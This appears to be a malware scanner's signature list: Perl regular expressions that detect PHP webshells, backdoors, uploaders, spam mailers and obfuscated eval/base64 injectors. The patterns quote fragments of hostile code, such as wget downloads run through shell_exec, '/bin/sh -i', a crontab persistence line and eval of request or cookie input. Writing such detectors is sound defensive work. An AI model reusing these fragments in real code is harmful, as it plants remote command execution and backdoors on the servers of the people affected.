qr/<\?php\s+\$\w\d\d=.+?if \(\!empty\(\$GLOBALS\[.+?\]\)\) \{ eval\(\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\'([A-z0-9_]{1,20})\'\]\); \} \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\(\$\w\d\d\[\d\d\]\.\$\w\d\d\[\d\d\]\.\$.+?\.\$\w\d\d\[\d\d\]\.\$\w\d\d\[\d\d\];/is,
qr/<\?php.+?EMelCo PHP WebShell.+?return \$salida;\s+\}\s+\?>/is,
qr/<\?php.+?\$shell = \'uname -a; w; id; \/bin\/sh -i\';.+?if \(\!\$daemon\) \{.+?\?>/is,
qr/<\?php.+?header\(\'WWW-Authenticate: Basic realm=\"r57shell\"\'\);.+?echo \'<\/body><\/html>\';\s+\?>/is,
qr/<\?.+?Mass Mailer.+?by KoOl.+?\?>\s+<\/span>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\/\/\$usuario=\'\';\s+\/\/\$contraseсa=\'\';\s+eval\(gzinflate\(base64_decode\(.+?\)\)\);\?>/is,
qr/<\?php.+?\$ea = \'_shaesx_\'; \$ay = \'get_data_ya\'; \$ae = \'decode\'; \$ea = str_replace\(\'_sha\', \'bas\', \$ea\); \$ao = \'wp_cd\'; \$ee = \$ea\.\$ae; \$oa = str_replace\(\'sx\', \'64\', \$ee\); \$algo = \'md5\';.+?function wp_cd\(\$fd, \$fa=\"\"\).+?\)\)\&\& \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\]\(\$([A-z0-9_]{1,20})\)\)\$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\]\(\$([A-z0-9_]{1,20})\);\}/is,
qr/<\?php \$([A-z0-9_]{1,20})=\"\\x70\\x72\\x65\\x67\\x5f\\x72\\x65\\x70\\x6c\\x61\\x63\\x65\";\$([A-z0-9_]{1,20})\(\"\\x7c\\x2e\\x7c\\x65\",\"\\x65\\x76\\x61\\x6c\\x28\\x27\\x65\\x76\\x61\\x6c\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65\\x28\\x22.+?\\x22\\x29\\x29\\x3b\\x27\\x29\",\'\.\'\);\?>/is,
qr/<\?php\s+\$url = base64_decode\(\$_SERVER\[\'QUERY_STRING\'\]\);.+?\$out \.= \"Connection: Close\\r\\n\\r\\n\";.+?\?>/is,
qr/<\?php.+?if \(\!function_exists\(\'exec\'\) or ini_get\(\'safe_mode\'\)\) \{ die \(\"STOP\. No available functions\.\"\); \}\s+\$bashcheck = \'\s+echo \$\(whoami\).+?unlink\(\'([A-z0-9_]{1,20})\.php\'\);\s+\?>/is,
qr/<\?php ignore_user_abort\(1\);set_time_limit\(0\);file_put_contents\(\"\/tmp\/.+?\"\)\); \@shell_exec\(\"perl.+?\?>/is,
qr/<\?php ignore_user_abort\(1\);set_time_limit\(0\);if\(move_uploaded_file\(\$_FILES\[.+?<\/form>\';\?>/is,
qr/<\?php \@shell_exec\(\"wget http:\/\/.+?\?>/is,
qr/<\?php system\(\$_SERVER\[\"HTTP_SHELL\"\]\);shell_exec\(\$_SERVER\[\"HTTP_SHELL\"\]\);passthru\(\$_SERVER\[\"HTTP_SHELL\"\]\);\?>/is,
qr/<\?php echo base64_decode\(.+?\); include\(\"http:\/\/.+?\?>/is,
qr/<\?php \@include\(\"http:\/\/.+?\/r57\.v?\"\); \?>/is,
qr/<\?php \@include\(\$_GET\[\"([A-z0-9_]{1,20})\"\]\); echo \"<b>\" \. md5\(\"([A-z0-9_]{1,20})\"\) \. \"<\/b><br>Love Hack WORLD :\]\"; \?>/is,
qr/<\?php passthru\(\"wget http:\/\/.+?\?>/is,
qr/<\? \@shell_exec\(\"wget http:\/\/.+?\?>/is,
qr/<\?php \$to = \"misterxgoofy\@hotmail\.com\";\s+\$subject = \"Exploited\";.+?echo\(\"<p>Message delivery failed\.\.\.<\/p>\"\);\s+\}; \?>/is,
qr/<\?php\s+\$filecontents=\'<\?php if\(stristr\(\$_SERVER\[\\\'HTTP_USER_AGENT\\\'\],\\\'google\\\'\)\)\{.+?\$filecontents",FILE_APPEND\);.+?\?>/is,
qr/<\?php \@passthru\(\"cd \/tmp; wget http:\/\/+?\?>/is,
qr/<\?php exec\(\"wget http:\/\/.+?\?>/is,
qr/<\?php+?elseif\(function_exists\(\"passthru\"\)\)\{.+?fclose\(\$handle\);.+?echo ex\(\"cd \/dev\/shm;rm -rf ([A-z0-9_]{1,20})\.txt\"\);\s+\?>/is,
qr/<\?php.+?if \(isset\(\$_GET\[\"cookie\"\]\)\) \{ echo \'cookie=4\'; if \(isset\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\) \@eval\(base64_decode\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\); exit; \}.+?\?>/is,
qr/<\? \/\*\*\/eval\(base64_decode\(\'aWYo.+?\)\); \?>/is,
qr/<\?php \/\*\*\/eval\(base64_decode\(\'aWYo.+?\'\)\); \?>/is,
qr/<html>.+?aDriv4 Here \^\^.+?echo \"<center>Copyright \&copy; \"\.date\(\"Y\"\)\.\".+?\?>\s+<\/html>/is,
qr/<\?php\s+error_reporting\(.+?echo \"DisablePHP=\"\.\$disable_functions; print \"\\n\";.+?\}\} \} \?>/is,
qr/GIF89a \w<\?php \@copy\(\$_FILES\[file\]\[tmp_name\], \$_FILES\[file\]\[name\]\); exit; \?>/is,
qr/<FORM ENCTYPE=\"multipart\/form-data\" METHOD=\"POST\">\s+<title>Uploader <\/title>.+?<INPUT TYPE=\"submit\" VALUE=\"Send\">\s+\<\/FORM>/is,
qr/<\?php if \(isset\(\$_GET\[([A-z0-9_]{1,20})\]\)\) \{preg_replace\(\"\\x2F.+?\\x3B\",\"\\x2E\"\);\}\?>/is,
qr/GIF([A-z0-9_]{1,20})\s+<\?php\s+if\( file_exists\(\$_FILES\[\"uploadfile\"\]\[\"tmp_name\"\]\) \).+?<INPUT TYPE=\"submit\" VALUE=\"Send\">\s+<\/FORM>/is,
qr/<\?php.+?W3LL M!N! SH3LL.+?\/\/ World.+?return \$info;\s+\}\s+\?>/is,
qr/<\?php.+?\$License = \"([A-z0-9_]{20,})\";.+?\$wpplugin_action = \'WPcheckInstall\';.+?header\(\'HTTP\/1\.0 404 Not Found\'\);\s+exit;/is,
qr/<\?.+?Loader\'z WEB Shell v.+?Coded by Loader and Modify By Zetha\s+<\/center><\/td>\s+<\/tr>\s+<\/table>/is,
qr/<\?php\s+echo \'\$Word\'\.\'Press !\';\s+if \(isset\(\$_POST\[\"wp\"\]\)\) \{\s+\$wp = \$_POST\[\"wp\"\];\s+if \(get_magic_quotes_gpc\(\)\) \$wp=stripslashes\(\$wp\);\s+file_put_contents\(\$_SERVER\[\"SCRIPT_FILENAME\"\],\'<\?php \'\.\$wp\.\' \?>\'\); \}\s+\?>/is,
qr/<\?php if \(isset\(\$_POST\[\"code\"\]\)\) eval\(base64_decode\(\$_POST\[\"code\"\]\)\); \?>/is,
qr/<\?php\s+echo \"\[!\]start\\n\";.+?function make_great_htaccess\(\$path\).+?echo \"\[-\] cant get the MHB client\\n\";\s+\}\s+\}/is,
qr/<\?php eval \(base64_decode \(\"aWY.+?\"\)\); \?>/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'cmd\'\]\)\) \{\s+eval\(base64_decode\(\$_REQUEST\[\'cmd\'\]\)\);\s+\}\s+\?>/is,
qr/<\?php\s+\/\* Authorization \*\/\s+\$passwordhash = \"([A-z0-9_]{20,})\";.+?if \(isset\(\$_COOKIE\[\'wp_defined\'\]\)\) \{.+?function pnotice \(\$str\) \{.+?<\?php\s+return;\s+\}\s+\?>/is,
qr/<\?php \$cookey = \"([A-z0-9_]{1,20})\"; \?>/is,
qr/<\?php\s+if \(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\) \{\s+file_put_contents\(\'([A-z0-9_]{1,20})\.php\', base64_decode\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\), LOCK_EX\);\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,10}) = \$_SERVER\[\'HTTP_USER_AGENT\'\];\s+\$keywordsRegex = \"\/([A-z0-9_]{20,})\/i\";\s+if \(preg_match\(\$keywordsRegex, \$([A-z0-9_]{1,10})\)\) \{\s+\$\w=\'bas\'\.\'e6\'\.\'4_d\'\.\'ecode\';eval\(\$\w\(.+?\)\);\s+\}\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,10})=\"ba\"\.\"se\"\.\"64_d\"\.\"ecode\";eval\(\$([A-z0-9_]{1,10})\(.+?\)\);\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,10}) = \$_SERVER\[\'HTTP_USER_AGENT\'\];\s+\$keywordsRegex = \"\/([A-z0-9_]{20,})\/i\";\s+if \(preg_match\(\$keywordsRegex, \$([A-z0-9_]{1,10})\)\) \{.+?echo \'<\/form>\';\s+exit\(\);\s+\}\s+\?>/is,
qr/<\?php if\(!class_exists\(.+?public \$ip_list_bing=array\(\"191\.232\.\*\".+?init\(\$ruri,\$host,\$is_bot\);\} \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = str_split\(rawurldecode\(str_rot13\(\$([A-z0-9_]{1,20})\)\)\).+?\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\[\$([A-z0-9_]{1,20})\] \. \"\/\" \. substr\(md5\(time\(\)\).+?exit\(\);\}\}\}/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$\{\"_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$\w=\/\*([A-z0-9_]{1,20})\*\/\"pr\"\.\"eg\"\.\"_r\"\.\"ep\"\.\"la\"\.\"ce\";\$\w\(\'\/\/e\',\$\{\"_RE\"\.\"QUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\],\'\'\);\/\*([A-z0-9_]{1,20})\*\/exit;\}/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/\$\w=\"assert\";\/\*([A-z0-9_]{1,20})\*\/\$\w=\$\w\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\} \/\/([A-z0-9_]{1,20})\s+if \(!extension_loaded\(\'IonCube_loader\'\)\).+?administrator\.\'\);return 0;\s+\?>\s+([A-z0-9_]{50,})/is,
qr/<\?php\s+\/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\} \@eval\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);\?>/is,
qr/<\?php\s+\/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\} if\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\}/is,
qr/<\?= \"\";.+?Berandal Shell.+?<form method=\"post\">\s+<input type=\"password\" name=\"pass\">\s+<\/form><\/center>/is,
qr/<\?php\s+\$to\s+= stripslashes\(\$_POST\[\"to_address\"\]\);.+?\'error : \'\.\$result;\s+\}\s+\?>/is,
qr/<\?php\s+echo \'good\';\s+echo \'<meta http-equiv=\"refresh\" content=\"0; url=http:\/\/.+?\" \/>\';\s+\?>/is,
qr/<\?php mail\(\'.+?\', \'MIME-Version: 1\.0.+?\'\);class DeleteOnExit \{function __destruct\(\)\{unlink\(__FILE__\);\}\}\$g_delete_on_exit = new DeleteOnExit\(\);echo \'good\';\?>/is,
qr/<\?php if\(empty\(\$_GET\[\'ineedthispage\'\]\)\).+?\}function randStringfrpernames\(\).+?\}return\$([A-z0-9_]{1,30});\};\s+\?>/is,
qr/<\?php ini_set\(\'display_errors\',\"Off\"\);ignore_user_abort\(1\);\$.+?\)\{\$([A-z0-9_]{1,20})=gzcompress\(base64_encode\(urlencode\(\$([A-z0-9_]{1,20})\)\),\d\);return urlencode\(\$([A-z0-9_]{1,20})\);\};\?>/is,
qr/<\?php \/\* ([A-z0-9_]{10,}) \*\/ \?><\?php\s+error_reporting\(E_ALL\);\$DOMAIN_FNAME1_([A-z0-9_]{1,10})=\'\.SIc7CYwgY\';\$DOMAIN_FNAME2_([A-z0-9_]{1,10})=\'\/var\/tmp\/\.SIc7CYwgY\';if\(isset\(\$_POST\[.+?\$str=enc\(\$str\);fwrite\(\$file,\$str\);fclose\(\$file\);\}\?>\s+<\?php \/\* ([A-z0-9_]{10,}) \*\/ \?>/is,
qr/<\?php preg_replace\(\"\/\.\*\/e\",\"eval\(gzinflate\(base64_decode\(.+?\)\)\);\",\"\.\"\);exit;\?>/is,
qr/<\?php.+?\$url = \".+?\";\s+\}\s+header\(\"Location: http:\/\/\$url\"\);\s+echo \"<meta http-equiv=\\\"content-type\\\" content=\\\"text\/html; charset=UTF-8\\\">\\n\";\s+echo \"<html><head><meta http-equiv=\\\"refresh\\\" content=\\\"0;url=http:\/\/\$url\\\"><\/head><\/html>\";\s+\?>/is,
qr/<html>\s+<head>\s+<meta http-equiv=\"refresh\" content=\"1; url=http:\/\/.+?document\.write\(\"<img src=\'\" + l + \"\'>\"\);\s+<\/script>\s+<body>\s+<h1>Loading\.\.\.<\/h1>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+header\(\"Location: http:\/\/.+?\"\);\s+die\(\);\s+\?>/is,
qr/<\?php\s+eval \( base64_decode \(\".+?\) \); \?>\s+<!--([A-z0-9_]{20,})-->/is,
qr/<\?php.+?system\(\'echo \"\* \* \* \* \* wget http:\/\/\'\.\$_SERVER\[\"HTTP_HOST\"\]\.\$_SERVER\[\"REQUEST_URI\"\]\.\'\" \| crontab\'\);.+?system\(\'echo \"\* \* \* \* \* wget http:\/\/\'\.\$_SERVER\[\"HTTP_HOST\"\]\.\$_SERVER\[\"REQUEST_URI\"\]\.\'\" \| crontab\'\);\s+\?>/is,
qr/<\?php\s+\$this->zipname = \$p_zipname.+?\$archive = new PclZip\(\"([A-z0-9_]{1,20})\.zip\"\);.+?\@unlink\(\"([A-z0-9_]{1,20})\.zip\"\);\s+die\(\"([0-9]{1,20})\"\);\s+\}/is,
qr/<\?php\s+extract\(\$_REQUEST\) && \@\$catch\(stripslashes\(\$user\)\) && exit;.+?function ([A-z0-9_]{1,20})\(\)\{\s+\$([A-z0-9_]{1,20})=\"([A-z0-9_]{20,})\";\s+\$([A-z0-9_]{1,20})=\"([A-z0-9_]{20,})\";\s+return \"\{\$([A-z0-9_]{1,20})\}\{\$([A-z0-9_]{1,20})\}\";\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20}) = basename\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/trim\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/preg_replace\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/rawurldecode\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\".+?\"\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/, \'\', __FILE__\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/\/\*([A-z0-9_]{1,20})\*\/\)\/\*([A-z0-9_]{1,20})\*\/;\$([A-z0-9_]{1,20}) =.+?%([A-z0-9_]{1,20})\Z/is,
qr/<\?php extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit;/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php\s+extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit; extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit;/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\}\?>/is,
qr/<\?php\s+\(\$([A-z0-9_]{1,20}) = \$_POST\[\'([A-z0-9_]{1,20})\'\]\) && \@preg_replace\(\'\/([A-z0-9_]{1,20})\/e\',\'\@\'\.str_rot13\(\'riny\'\)\.\'\(\$([A-z0-9_]{1,20})\)\', \'([A-z0-9_]{1,20})\'\);\s+\?>/is,
qr/<\?php if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php if \(isset\(\$\{\"_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$\w=\"ass\"\.\"ert\";\$\w\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\);exit;\}/is,
qr/<\?php if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{eval\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\}\?>/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\/\*([A-z0-9_]{1,20})\*\/\(isset\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\(\$_COOKIE\[\"([A-z0-9_]{1,20})\"\]\);exit;\/\*([A-z0-9_]{1,20})\*\/\}\/\*([A-z0-9_]{1,20})\*\//is,
qr/<\?php if\(isset\(\$\{\"_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$\w\/\*([A-z0-9_]{1,20})\*\/=\"pre\"\.\"g_r\"\.\"epl\"\.\"ace\";\$\w\(\'\/\/e\'\,\$\{\"_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\],\'\'\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}/is,
qr/ \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\/\*([A-z0-9_]{1,20})\*\/\$\w=\"as\"\.\"se\"\.\"rt\";\/\*([A-z0-9_]{1,20})\*\/\$\w=\$\w\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/ extract\(\$_REQUEST\) && \@\$([A-z0-9_]{1,20})\(stripslashes\(\$([A-z0-9_]{1,20})\)\) && exit;/is,
qr/<\?php \/\*([A-z0-9_]{1,20})\*\/if\(isset\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})=\/\*([A-z0-9_]{1,20})\*\/\"preg_repl\"\.\"ace\";\/\*([A-z0-9_]{1,20})\*\/\$\w\(\'\/\/e\',\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\],\'\'\);\/\*([A-z0-9_]{1,20})\*\/exit;\}/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\/\*([A-z0-9_]{1,20})\*\/\{\$([A-z0-9_]{1,20})=\/\*([A-z0-9_]{1,20})\*\/\"ass\"\.\"ert\";\/\*([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\/\*([A-z0-9_]{1,20})\*\/;exit;\/\*([A-z0-9_]{1,20})\*\/\} if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/=\"asse\"\.\"rt\";\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\/\*([A-z0-9_]{1,20})\*\/\(\/\*([A-z0-9_]{1,20})\*\/\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);\/\*([A-z0-9_]{1,20})\*\/exit;\/\*([A-z0-9_]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\(!empty\(\$_GET\[\'image\'\]\) && \$_GET\[\'image\'\] = \'image\'\) \{\s+if\(isset\(\$_POST\[\'Submit\'\]\)\)\{.+?\@move_uploaded_file\(\$tmp, \$path\);.+?<input type=\"Submit\" name=\"Submit\" value=\"Submit\"><\/form>\s+<\?php\s+\}\s+\}/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$\w,\$\w,\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w\.\$\w\.\$\w;\}\$([A-z0-9_]{1,20}) =.+?\$([A-z0-9_]{1,20}) = \"bas\\x656\\x34\\x5fd\";\$([A-z0-9_]{1,20}) = \"\\x29\)\)\\x3B\".+?\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php\s+if \(\$_GET \[\'([A-z0-9_]{1,20})\'\]\) \{\s+echo \"OK\";\s+exit \(\);\s+\}\s+if\(\$_POST\[\'to\'\]\)\s+\{\s+\$to = \$_POST \[\'to\'\];.+?header \( \"Location: http:\/\/\{\$link\}\" \);\s+\}/is,
qr/<script type=\"text\/javascript\">var _0x2515=\[\"\",\"\\x.+?\\x65\"\];document\[_0x2515\[5\]\].+?\(_0x2515\[0\]\)\);<\/script>/is,
qr/var _0x2515=\[\"\",\"\\x6A\\x6F\\x69\\x6E\".+?\"\];document\[_0x2515\[5\]\].+?\(_0x2515\[0\]\)\);/is,
qr/<\?php\s+if \(!defined\(\'stream_context_create \'\)\)\s+\{\s+define\(\'stream_context_create \', 1\);.+?\$([A-z0-9_]{1,20})=\"rawurl\" \. \"decode\";return \$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\);\}.+?eval\/\*([A-z0-9_]{1,20})\*\/\(([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}), \$([A-z0-9_]{1,20})\)\);\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'g\'\. \'z\'\. \'u\'\. \'n\'\. \'c\'\. \'o\'\. \'m\'\. \'p\'\. \'r\'\. \'e\'\. \'s\'\. \'s\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'i\' \.\'m\' \.\'p\' \.\'l\' \.\'o\' \.\'d\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzun\', \'comp\', \'ress\'\) ;\$([A-z0-9_]{1,20}) = \'\'\.chr\(105\)\.\'\'\.chr\(109\)\.\'\'\.chr\(112\)\.\'l\'\.chr\(111\)\.\'de\' ; \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); eval \( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \'\', \$([A-z0-9_]{1,20}) \) \) \) \) ; \?>/is,
qr/<\?php \$([A-z0-9_]{10,})=.+?eval\(gzinflate\(base64_decode\(\$([A-z0-9_]{10,})\)\)\); \?>/is,
qr/<\?php.+?\$id = \"([A-z0-9_]{1,20})\";\s+\$slow = array\(.+?\$wp2wp=\'str_r\'\.\'ot\'\.\'1\'\.\'3\';.+?if\(isset\(\$_GET\[1\]\)\)\{\$_=\$_GET;\$_\[1\]\(\$_\[2\]\);exit;\}/is,
qr/<\?php\s+\/\/die\(\"Temporary Under Maintenance\"\);.+?if\(is_uploaded_file\(\$_FILES\[([A-z0-9_]{1,20})\]\[tmp_name\]\)\) \{ \@copy\(\$_FILES\[([A-z0-9_]{1,20})\]\[tmp_name\],\$_FILES\[([A-z0-9_]{1,20})\]\[name\]\); \}\};\}.+?404 Not Found<\/h1>\";\s+exit\(\);\s+\}\?>/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);exit;\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?array\(\'ba\' \,\'se\' \,\'64\' \,\'_d\' \,\'ec\' \,\'od\' \,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'g\'\, \'z\'\, \'u\'\, \'n\'\, \'c\'\, \'o\'\, \'m\'\, \'p\'\, \'r\'\, \'e\'\, \'s\'\, \'s\'\) ;\$.+?eval.+?\) \) \) \) ; \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array.+? array\(\'bas\' \,\'e64\' \,\'_de\' \,\'cod\' \,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzu\'\, \'nco\'\, \'mpr\'\, \'ess\'\) ;\$([A-z0-9_]{1,20}).+?eval.+?\) \) \) \) ; \?>/is,
qr/<\?php\s+if \(isset\(\$_POST\[\'([A-z0-9_-]{1,20})\'\]\)\) \{\s+eval\(\$_POST\[\'([A-z0-9_-]{1,20})\'\]\);\s+\};\s+\?>/is,
